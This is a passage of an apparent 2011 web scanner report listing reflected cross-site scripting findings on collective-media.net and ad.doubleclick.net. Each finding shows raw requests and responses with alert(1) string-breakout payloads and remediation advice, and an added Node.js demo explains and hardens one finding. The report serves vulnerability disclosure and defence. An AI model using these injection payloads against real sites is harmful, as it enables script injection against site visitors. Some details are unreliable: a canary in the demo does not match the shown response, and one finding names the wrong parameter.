Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 445
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:37:02 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 15:37:02 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.rub_usatoday/;sz=728x90;net=cm;ord=[timestamp]?2af5b'-alert(1)-'737101c3cfa;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
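
To make concrete why 19712'-alert(1)-'edff4653ce4 executes here, the following Node.js script is an added example, not code from the report or from collective-media.net. renderAdjVulnerable() rebuilds the response body of finding 2.10 from a site code and size by string concatenation (how the real server assembles it, and the closing </scr'+'ipt> that the report snips, are assumptions); runInStubBrowser() evaluates the result with stub document and alert objects standing in for a publisher page that loads it via <script src>, so the single quote ending the string literal and the remainder parsing as a subtraction that calls alert(1) can be observed. renderAdjSafe() then emits an equivalent tag with allow-listed fields and a properly escaped string literal. The stub page URL http://www.usatoday.com/ and all function and constant names are this example's own.

```javascript
// Added example (not code from the report or from collective-media.net).
// Reproduces why the 2.10 canary fires once the response runs as a script, then
// emits the same ad tag in a form that cannot be broken out of.

// Reconstructed from the response body in finding 2.10. The server-side
// concatenation and the closing </scr'+'ipt> (snipped in the report) are assumed.
function renderAdjVulnerable(site, sz) {
  return (
    "var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;\n" +
    "var ifr = (self==top ? '' : 'env=ifr;');\n" +
    "document.write('<scr'+'ipt language=\"javascript\" src=\"http://k.collective-media.net/cmadj/" +
    site + "/;sz=" + sz + ";net=cm;ord=[timestamp];'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + " +
    "';cmpgurl='+escape(escape(cmPageURL))+'?\"></scr'+'ipt>');"
  );
}

// Hardened form: allow-list each field (site codes and sizes have a fixed shape),
// then emit the URL as a real JavaScript string literal. JSON.stringify yields a
// valid double-quoted literal; '<' and '/' are escaped too so the text stays inert
// even if the response were ever parsed as HTML. encodeURIComponent() alone would
// not do here: it leaves the single quote unescaped.
const SITE_RE = /^[A-Za-z0-9._-]{1,64}$/;
const SIZE_RE = /^\d{1,4}x\d{1,4}$/;

function jsLiteral(s) {
  return JSON.stringify(s).replace(/</g, '\\u003c').replace(/\//g, '\\/');
}

function renderAdjSafe(site, sz) {
  if (!SITE_RE.test(site)) throw new Error('rejected site code: ' + site);
  if (!SIZE_RE.test(sz)) throw new Error('rejected size: ' + sz);
  const base = 'http://k.collective-media.net/cmadj/' + site + '/;sz=' + sz + ';net=cm;';
  return (
    "var s=document.createElement('script');" +
    's.src=' + jsLiteral(base) + "+(self==top?'':'env=ifr;')+'ord1='+Math.floor(Math.random()*1000000)+" +
    "';cmpgurl='+encodeURIComponent(self==top?document.location.href:document.referrer);" +
    'document.head.appendChild(s);'
  );
}

// Minimal stand-in for a page that loads the response with <script src>:
// records alert() calls and the script URLs that end up being requested.
// Function bodies built with new Function are sloppy-mode, like the real ad tag.
function runInStubBrowser(script) {
  const alerts = [];
  const srcs = [];
  const self = {};
  const document = {
    location: { href: 'http://www.usatoday.com/' }, // stand-in publisher page (assumed)
    referrer: '',
    write: html => { const m = /src="([^"]*)"/.exec(html); srcs.push(m ? m[1] : html); },
    createElement: () => ({}),
    head: { appendChild: el => srcs.push(el.src) },
  };
  new Function('self', 'top', 'document', 'alert', script)(self, self, document, v => { alerts.push(v); });
  return { alerts, srcs };
}

const CANARY_SITE = "cm.rub_usatoday19712'-alert(1)-'edff4653ce4"; // from the 2.10 request

function demo() {
  const hit = runInStubBrowser(renderAdjVulnerable(CANARY_SITE, '728x90'));
  const ok = runInStubBrowser(renderAdjSafe('cm.rub_usatoday', '728x90'));
  let rejected = false;
  try { renderAdjSafe(CANARY_SITE, '728x90'); } catch (e) { rejected = true; }
  return { vulnerableAlerts: hit.alerts, safeAlerts: ok.alerts, safeSrc: ok.srcs[0], canaryRejected: rejected };
}

console.log(demo());
```

Run with node: the printed object shows one alert from the vulnerable render, none from the hardened one, and the canary rejected by the allow-list. The same two steps, allow-list then an escaped literal, also close the double-quoted string reflections on ad.doubleclick.net in findings 2.13 to 2.15.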

2.13. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10 [adurl parameter]

Summary

Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adi/N4300.Google/B5350353.10

Issue detail

The value of the adurl request parameter, part of the click-tracking URL passed in the click= macro, is copied unmodified into a double-quoted JavaScript string inside the inline script of the returned ad document (the line that follows, var fscUrl = url;, indicates the string is assigned to url). The payload 9cb2e"-alert(1)-"d8f71e66f7b was submitted in the adurl parameter and echoed unmodified; the server then appends the campaign landing URL directly after it. The double quote in the payload closes the string literal, so the rest parses as a subtraction that calls alert(1).

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. Unlike the ad-tag scripts above, this response is a complete text/html document, so the injected code runs in the ad.doubleclick.net origin whenever the document is rendered, including inside the ad iframe that a publisher page creates and on direct navigation.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the click URL must be embedded, it should be emitted as an escaped JavaScript string literal (at minimum encoding the double quote, backslash, < and /) rather than concatenated raw.

Request

GET /adi/N4300.Google/B5350353.10;sz=300x250;pc=gdncID5TgIAAAA;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BULngQgrITcOnDJHZsAeGwKDBDdiymZsCyL6SpCWQpurvRAAQARgBIIKq8w44AFCY-bG__f____8BYMmGhYmIpIQQoAGo5r7SA7IBE3d3dy50aGVyZXB1YmxpYy5jb226AQozMDB4MjUwX2FzyAEJ2gEgaHR0cDovL3d3dy50aGVyZXB1YmxpYy5jb20vaG9tZS_gAQKYAowLuAIYwAIEyALwmsMcqAMB6AOSA-gDtSroA-kH6AOzKegDuyr1AwAAAEQ&num=1&sig=AGiWqtzhtV9arjYrbkbunikl44fw8R6R4Q&client=ca-pub-8560941387472259&adurl=9cb2e"-alert(1)-"d8f71e66f7b HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8560941387472259&output=html&h=250&slotname=5743098821&w=300&lmt=1304973456&flash=10.2.154&url=http%3A%2F%2Fwww.therepublic.com%2Fhome%2F&dt=1304955456866&bpp=1&shv=r20110427&jsv=r20110427&prev_slotnames=8504762554&correlator=1304955456958&frm=0&adk=2931618045&ga_vid=434740447.1304955454&ga_sid=1304955454&ga_hid=157227490&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&ref=http%3A%2F%2Fwww.therepublic.com%2Flogin%2Fprocess%2F&fu=0&ifi=3&dtd=130&xpc=trYOXTDiAY&p=http%3A//www.therepublic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7479
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 15:38:51 GMT
Expires: Mon, 09 May 2011 15:38:51 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
2FzyAEJ2gEgaHR0cDovL3d3dy50aGVyZXB1YmxpYy5jb20vaG9tZS_gAQKYAowLuAIYwAIEyALwmsMcqAMB6AOSA-gDtSroA-kH6AOzKegDuyr1AwAAAEQ&num=1&sig=AGiWqtzhtV9arjYrbkbunikl44fw8R6R4Q&client=ca-pub-8560941387472259&adurl=9cb2e"-alert(1)-"d8f71e66f7bhttps://www.hyatt.com/gp/en/offers/possibilities-promo.jsp?src=agn_phd_GP_ba_google");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscripta
...[SNIP]...

2.14. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10 [ai parameter]

Summary

Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adi/N4300.Google/B5350353.10

Issue detail

The value of the ai request parameter, part of the click-tracking URL passed in the click= macro, is copied unmodified into the same double-quoted JavaScript string inside the ad document's inline script as in finding 2.13. The payload 81156"-alert(1)-"869df1a9c74 was submitted appended to the legitimate ai value and echoed unmodified in the response, where its double quote closes the string literal.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The response is a complete text/html document, so the injected code runs whenever the ad is rendered, in the ad iframe or on direct navigation.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. The ai value is an opaque token and should be validated against its expected character set before being embedded, and embedded only as an escaped JavaScript string literal.

Request

GET /adi/N4300.Google/B5350353.10;sz=300x250;pc=gdncID5TgIAAAA;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BULngQgrITcOnDJHZsAeGwKDBDdiymZsCyL6SpCWQpurvRAAQARgBIIKq8w44AFCY-bG__f____8BYMmGhYmIpIQQoAGo5r7SA7IBE3d3dy50aGVyZXB1YmxpYy5jb226AQozMDB4MjUwX2FzyAEJ2gEgaHR0cDovL3d3dy50aGVyZXB1YmxpYy5jb20vaG9tZS_gAQKYAowLuAIYwAIEyALwmsMcqAMB6AOSA-gDtSroA-kH6AOzKegDuyr1AwAAAEQ81156"-alert(1)-"869df1a9c74&num=1&sig=AGiWqtzhtV9arjYrbkbunikl44fw8R6R4Q&client=ca-pub-8560941387472259&adurl=;ord=68443379? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8560941387472259&output=html&h=250&slotname=5743098821&w=300&lmt=1304973456&flash=10.2.154&url=http%3A%2F%2Fwww.therepublic.com%2Fhome%2F&dt=1304955456866&bpp=1&shv=r20110427&jsv=r20110427&prev_slotnames=8504762554&correlator=1304955456958&frm=0&adk=2931618045&ga_vid=434740447.1304955454&ga_sid=1304955454&ga_hid=157227490&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&ref=http%3A%2F%2Fwww.therepublic.com%2Flogin%2Fprocess%2F&fu=0&ifi=3&dtd=130&xpc=trYOXTDiAY&p=http%3A//www.therepublic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 15:38:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7509

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
44AFCY-bG__f____8BYMmGhYmIpIQQoAGo5r7SA7IBE3d3dy50aGVyZXB1YmxpYy5jb226AQozMDB4MjUwX2FzyAEJ2gEgaHR0cDovL3d3dy50aGVyZXB1YmxpYy5jb20vaG9tZS_gAQKYAowLuAIYwAIEyALwmsMcqAMB6AOSA-gDtSroA-kH6AOzKegDuyr1AwAAAEQ81156"-alert(1)-"869df1a9c74&num=1&sig=AGiWqtzhtV9arjYrbkbunikl44fw8R6R4Q&client=ca-pub-8560941387472259&adurl=https%3a%2f%2fwww.hyatt.com/gp/en/offers/possibilities-promo.jsp%3Fsrc%3Dagn_phd_GP_ba_google");
var fscUrl = url;
...[SNIP]...

2.15. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4300.Google/B5350353.10

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7de38"-alert(1)-"0bf768e1cd4 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4300.Google/B5350353.10;sz=300x250;pc=gdncID5TgIAAAA;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BULngQgrITcOnDJHZsAeGwKDBDdiymZsCyL6SpCWQpurvRAAQARgBIIKq8w44AFCY-bG__f____8BYMmGhYmIpIQQoAGo5r7SA7IBE3d3dy50aGVyZXB1YmxpYy5jb226AQozMDB4MjUwX2FzyAEJ2gEgaHR0cDovL3d3dy50aGVyZXB1YmxpYy5jb20vaG9tZS_gAQKYAowLuAIYwAIEyALwmsMcqAMB6AOSA-gDtSroA-kH6AOzKegDuyr1AwAAAEQ&num=1&sig=AGiWqtzhtV9arjYrbkbunikl44fw8R6R4Q&client=ca-pub-85609413874722597de38"-alert(1)-"0bf768e1cd4&adurl=;ord=68443379? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8560941387472259&output=html&h=250&slotname=5743098821&w=300&lmt=1304973456&flash=10.2.154&url=http%3A%2F%2Fwww.therepublic.com%2Fhome%2F&dt=1304955456866&bpp=1&shv=r20110427&jsv=r20110427&prev_slotnames=8504762554&correlator=1304955456958&frm=0&adk=2931618045&ga_vid=434740447.1304955454&ga_sid=1304955454&ga_hid=157227490&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&ref=http%3A%2F%2Fwww.therepublic.com%2Flogin%2Fprocess%2F&fu=0&ifi=3&dtd=130&xpc=trYOXTDiAY&p=http%3A//www.therepublic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 15:38:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7505

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
B4MjUwX2FzyAEJ2gEgaHR0cDovL3d3dy50aGVyZXB1YmxpYy5jb20vaG9tZS_gAQKYAowLuAIYwAIEyALwmsMcqAMB6AOSA-gDtSroA-kH6AOzKegDuyr1AwAAAEQ&num=1&sig=AGiWqtzhtV9arjYrbkbunikl44fw8R6R4Q&client=ca-pub-85609413874722597de38"-alert(1)-"0bf768e1cd4&adurl=https%3a%2f%2fwww.hyatt.com/gp/en/offers/possibilities-promo.jsp%3Fsrc%3Dagn_phd_GP_ba_google");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
v
...[SNIP]...

2.16. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10 [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4300.Google/B5350353.10

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c88d7"-alert(1)-"6821c14b674 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4300.Google/B5350353.10;sz=300x250;pc=gdncID5TgIAAAA;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BULngQgrITcOnDJHZsAeGwKDBDdiymZsCyL6SpCWQpurvRAAQARgBIIKq8w44AFCY-bG__f____8BYMmGhYmIpIQQoAGo5r7SA7IBE3d3dy50aGVyZXB1YmxpYy5jb226AQozMDB4MjUwX2FzyAEJ2gEgaHR0cDovL3d3dy50aGVyZXB1YmxpYy5jb20vaG9tZS_gAQKYAowLuAIYwAIEyALwmsMcqAMB6AOSA-gDtSroA-kH6AOzKegDuyr1AwAAAEQ&num=1c88d7"-alert(1)-"6821c14b674&sig=AGiWqtzhtV9arjYrbkbunikl44fw8R6R4Q&client=ca-pub-8560941387472259&adurl=;ord=68443379? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8560941387472259&output=html&h=250&slotname=5743098821&w=300&lmt=1304973456&flash=10.2.154&url=http%3A%2F%2Fwww.therepublic.com%2Fhome%2F&dt=1304955456866&bpp=1&shv=r20110427&jsv=r20110427&prev_slotnames=8504762554&correlator=1304955456958&frm=0&adk=2931618045&ga_vid=434740447.1304955454&ga_sid=1304955454&ga_hid=157227490&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&ref=http%3A%2F%2Fwww.therepublic.com%2Flogin%2Fprocess%2F&fu=0&ifi=3&dtd=130&xpc=trYOXTDiAY&p=http%3A//www.therepublic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 15:38:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7505

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
-bG__f____8BYMmGhYmIpIQQoAGo5r7SA7IBE3d3dy50aGVyZXB1YmxpYy5jb226AQozMDB4MjUwX2FzyAEJ2gEgaHR0cDovL3d3dy50aGVyZXB1YmxpYy5jb20vaG9tZS_gAQKYAowLuAIYwAIEyALwmsMcqAMB6AOSA-gDtSroA-kH6AOzKegDuyr1AwAAAEQ&num=1c88d7"-alert(1)-"6821c14b674&sig=AGiWqtzhtV9arjYrbkbunikl44fw8R6R4Q&client=ca-pub-8560941387472259&adurl=https%3a%2f%2fwww.hyatt.com/gp/en/offers/possibilities-promo.jsp%3Fsrc%3Dagn_phd_GP_ba_google");
var fscUrl = url;
var f
...[SNIP]...

2.17. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4300.Google/B5350353.10

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8117d"-alert(1)-"7e74982024a was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4300.Google/B5350353.10;sz=300x250;pc=gdncID5TgIAAAA;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BULngQgrITcOnDJHZsAeGwKDBDdiymZsCyL6SpCWQpurvRAAQARgBIIKq8w44AFCY-bG__f____8BYMmGhYmIpIQQoAGo5r7SA7IBE3d3dy50aGVyZXB1YmxpYy5jb226AQozMDB4MjUwX2FzyAEJ2gEgaHR0cDovL3d3dy50aGVyZXB1YmxpYy5jb20vaG9tZS_gAQKYAowLuAIYwAIEyALwmsMcqAMB6AOSA-gDtSroA-kH6AOzKegDuyr1AwAAAEQ&num=1&sig=AGiWqtzhtV9arjYrbkbunikl44fw8R6R4Q8117d"-alert(1)-"7e74982024a&client=ca-pub-8560941387472259&adurl=;ord=68443379? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8560941387472259&output=html&h=250&slotname=5743098821&w=300&lmt=1304973456&flash=10.2.154&url=http%3A%2F%2Fwww.therepublic.com%2Fhome%2F&dt=1304955456866&bpp=1&shv=r20110427&jsv=r20110427&prev_slotnames=8504762554&correlator=1304955456958&frm=0&adk=2931618045&ga_vid=434740447.1304955454&ga_sid=1304955454&ga_hid=157227490&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&ref=http%3A%2F%2Fwww.therepublic.com%2Flogin%2Fprocess%2F&fu=0&ifi=3&dtd=130&xpc=trYOXTDiAY&p=http%3A//www.therepublic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 15:38:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7505

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
3dy50aGVyZXB1YmxpYy5jb226AQozMDB4MjUwX2FzyAEJ2gEgaHR0cDovL3d3dy50aGVyZXB1YmxpYy5jb20vaG9tZS_gAQKYAowLuAIYwAIEyALwmsMcqAMB6AOSA-gDtSroA-kH6AOzKegDuyr1AwAAAEQ&num=1&sig=AGiWqtzhtV9arjYrbkbunikl44fw8R6R4Q8117d"-alert(1)-"7e74982024a&client=ca-pub-8560941387472259&adurl=https%3a%2f%2fwww.hyatt.com/gp/en/offers/possibilities-promo.jsp%3Fsrc%3Dagn_phd_GP_ba_google");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode
...[SNIP]...

2.18. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4300.Google/B5350353.10

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64633"-alert(1)-"82f4d6621e2 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4300.Google/B5350353.10;sz=300x250;pc=gdncID5TgIAAAA;click=http://googleads.g.doubleclick.net/aclk?sa=l64633"-alert(1)-"82f4d6621e2&ai=BULngQgrITcOnDJHZsAeGwKDBDdiymZsCyL6SpCWQpurvRAAQARgBIIKq8w44AFCY-bG__f____8BYMmGhYmIpIQQoAGo5r7SA7IBE3d3dy50aGVyZXB1YmxpYy5jb226AQozMDB4MjUwX2FzyAEJ2gEgaHR0cDovL3d3dy50aGVyZXB1YmxpYy5jb20vaG9tZS_gAQKYAowLuAIYwAIEyALwmsMcqAMB6AOSA-gDtSroA-kH6AOzKegDuyr1AwAAAEQ&num=1&sig=AGiWqtzhtV9arjYrbkbunikl44fw8R6R4Q&client=ca-pub-8560941387472259&adurl=;ord=68443379? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8560941387472259&output=html&h=250&slotname=5743098821&w=300&lmt=1304973456&flash=10.2.154&url=http%3A%2F%2Fwww.therepublic.com%2Fhome%2F&dt=1304955456866&bpp=1&shv=r20110427&jsv=r20110427&prev_slotnames=8504762554&correlator=1304955456958&frm=0&adk=2931618045&ga_vid=434740447.1304955454&ga_sid=1304955454&ga_hid=157227490&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&ref=http%3A%2F%2Fwww.therepublic.com%2Flogin%2Fprocess%2F&fu=0&ifi=3&dtd=130&xpc=trYOXTDiAY&p=http%3A//www.therepublic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 15:38:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7505

